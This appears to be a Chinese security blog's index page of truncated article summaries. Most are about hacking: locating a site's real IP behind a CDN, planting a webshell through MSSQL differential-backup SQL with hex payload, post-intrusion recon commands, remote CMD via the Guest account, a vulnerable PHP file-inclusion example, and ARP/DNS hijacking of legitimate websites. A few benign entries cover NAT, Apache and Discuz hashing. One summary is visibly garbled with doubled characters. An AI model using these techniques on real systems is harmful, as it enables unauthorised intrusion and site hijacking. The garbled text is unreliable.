摘要： 现在很多网站用了cdn技术，在做一些测试的时候，想获取其服务器真实IP地址就有点困难，不知道现在还有其他什么好的方法呢，整理了下，目前知道如下两种：1：拿CDN服务器 找出真实IP cache_peer 1.1.1.1 parent 80 0 no-query originserver cache_peer_domain 1.1.1.1 www.c2sec.com2：判断HTTP_X_FORWARDED_FOR是否为空，不为空把这个作为IP地址，否则取得REMOTE_ADDR作为IP地址。 如果服务器可以上传文件，可上传文件加如下代码： Request.ServerVariables(“LOC 阅读全文

摘要： MSSQL差异备份，就是和前一次备份作对比，把不一样的内容备份下来，这样，只要前一次备份后，插入新的内容，差异备份就可以把刚插入的内容备份出来，而这个备份文件将大大减少,得到webShell的成功也提高了不少！ 差异备份的流程大概这样：1.完整备份一次(保存位置当然可以改)backup database 库名 to disk = 'c:\ddd.bak';--2.创建表并插入数据create table [dbo].[dtest] ([cmd] [image]);--insert into dtest(cmd) values(0x3C2565786563757465287265 阅读全文

摘要： 远程终端连接超出最大连接。 可以用这个命令 开始- 运行 mstsc /admin————-当使用菜刀出现乱码时 可设置编码为 utf-8将不会出现乱码————-ver 查查看服务器版版本号对应应版本号对应应的系统 5.0 2000 5.1 xp 5.2 2003 6.0 vvista 6..1 2008 6.17 2007systeeminfo 查看补补丁及系统信信息了解解了系统相关关信息。 进行行查看补丁号号：（这个命令令比较好用）dir cc:windows>>a.txt&(for %%i in (KB9522004.log KB9956572.log KKB2393 阅读全文

摘要： 看见最近大家讨论远程调用cmd比较热，所以就想写一下自己使用远程调用CMD的一些小结下载 (53.53 KB)5 小时前主要细节请参考 http://lcx.cc/?i=3221我以windows 2003系统做演示.1.激活本地Guest账号 下载 (54.68 KB)5 小时前2.在组策略中将 网络访问: 本地帐户的共享和安全模型 改为经典 (2003系统默认为经典模式，不用修改) 下载 (79.62 KB)5 小时前3.开启server服务,server服务就是网络共享需要的服务 看我的，本地没有server服务(这个要特别注意) 下载 (3.69 KB)5 小时前我们去网络添加打印机协 阅读全文

摘要： 1.单击“开始”，指向“程序”，指向“管理工具”，然后单击“路由和远程访问”。2. 在控制台树中，打开“服务器名称”，然后打开“IP路由”，再单击“NAT/基本防火墙”。3. 在详细信息窗格中，右键单击您的公共接口，然后单击“属性”。4. 在“服务和端口”选项看上，在“服务”列表中，定位与资源服务器匹配的预定义服务。5. 如果存在一个匹配的服务，则通过单击服务复选框启用映射，并选择“在此接口上”或“在此地址池条目上”。如果选择“在此地址池条目上”，则键入已保留的公共地址，再在“专用地址”中键入资源服务器的专用地址，然后执行步骤8。6. 如果不存在匹配的服务，则单击“添加”。7. 在“添加服务” 阅读全文

摘要： php 中可以通过include()、require()、include_once()、require_once() 函数包含文件，被包含的文件无论类型都会被执行。 当allow_url_include 配置为on 时，则允许包含远程文件，反之为off 时则只允许包含本地文件。另外一个比较关键的配置为open_basedir，这个选项限定了可以包含的目录。1、代码示例：PHP<?phpinclude($_GET['test']);?>123<?phpinclude($_GET['test']);?>本地文件：192.168.1.8/tes 阅读全文

摘要： Apache 下载地址 http://httpd.apache.org/ 我下载的是 Apache HTTP Server (httpd) 2.2.17 点击 download ，选择httpd-2.2.17-win32-x86-openssl-0.9.8o.msi 当然，你也可以下载源代码 httpd-2.2.17-win32-src.zip ，不过需要自己编译。（我们第一次选择安装版，然后配置好，以后就可以在任何地方使用了）PHP 下载地址 http://windows.php.net/download/ 下载的时候有几个不同版本选择：VC9 x86 Non Thread Safe VC9 阅读全文

摘要： 一般我们的加密都是采用md5加密方式：md5(变量)。但是昨天需要整合discuz的论坛，看他的加密方式也像是md5，但是简单的123加密后竟然解密不出来。后来在网上查了一下，发现他不只是简单的md5加密，而是“md5+随机”。当然这样更安全了。 网站安全了，程序自然也就复杂了... discuz的加密方式：md5(md5($password).$salt)，$salt是一个6位随机数。 注册的时候，把用户的密码用md5(md5($password).$salt)加密，$salt是一个6位随机数字，下面是我的一个获取6位随机数的一个方法： function randstr($len=6... 阅读全文

摘要： #1 Nessus：最好的UNIX漏洞扫描工具 Nessus 是最好的免费网络漏洞扫描器，它可以运行于几乎所有的UNIX平台之上。它不止永久升级，还免费提供多达11000种插件（但需要注册并接受EULA-acceptance--终端用户授权协议）。它的主要功能是远程或本地（已授权的）安全检查，客户端/服务器架构，GTK（Linux下的一种图形界面）图形界面，内置脚本语言编译器，可以用其编写自定义插件，或用来阅读别人写的插件。Nessus 3 已经开发完成（now closed source），其现阶段仍然免费，除非您想获得最新的插件。#2 Wireshark：网络嗅探工具 Wireshar.. 阅读全文

摘要： 这个文章主要就是说同网关和非同网关的 IP 域名劫持。 需要工具御剑 1.5MAC 地址扫描 MAC 地址修改 NetFuke_1.07今天就拿国内几个正规的网站来做吧，本来准备拿某黑客论坛做教程，做过一次以后站长把DNS 关了，所以只有换个站来搞了。第一、 同网关劫持方法。1、 用 MAC 地址扫描器来扫描一下同网关下的 MAC 地址。115.***.246.1—115.***.246.16 这几个是同网关下的 IP。2、 用御剑扫描 C 段下同网关的网站。OK，我们就选择 115.***.246.2 这个下面的某论坛吧。3、 打开我们的 NetFuke_1.07 工具来进行设置4、打开嗅探 阅读全文